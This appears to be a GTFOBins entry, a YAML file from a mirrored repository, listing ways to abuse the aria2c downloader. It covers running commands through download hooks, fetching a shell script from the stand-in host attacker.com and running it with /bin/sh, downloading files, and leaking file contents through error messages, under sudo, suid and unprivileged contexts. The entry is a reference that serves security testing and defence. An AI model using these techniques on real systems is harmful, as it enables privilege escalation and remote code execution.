mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 22:46:19 +01:00
44 lines
1.4 KiB
Plaintext
44 lines
1.4 KiB
Plaintext
---
|
|
functions:
|
|
command:
|
|
- code: |-
|
|
echo /path/to/command >/path/to/temp-file
|
|
chmod +x /path/to/temp-file
|
|
aria2c --on-download-error=/path/to/temp-file http://some-invalid-domain
|
|
comment: |-
|
|
Note that the subprocess is immediately sent to the background.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
- code: |-
|
|
aria2c --allow-overwrite --gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa
|
|
comment: |-
|
|
The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
shell: true
|
|
unprivileged:
|
|
download:
|
|
- code: |-
|
|
aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file
|
|
comment: |-
|
|
Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
file-read:
|
|
- binary: false
|
|
code: |-
|
|
aria2c -i /path/to/input-file
|
|
comment: |-
|
|
The file is leaked as error messages.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
...
|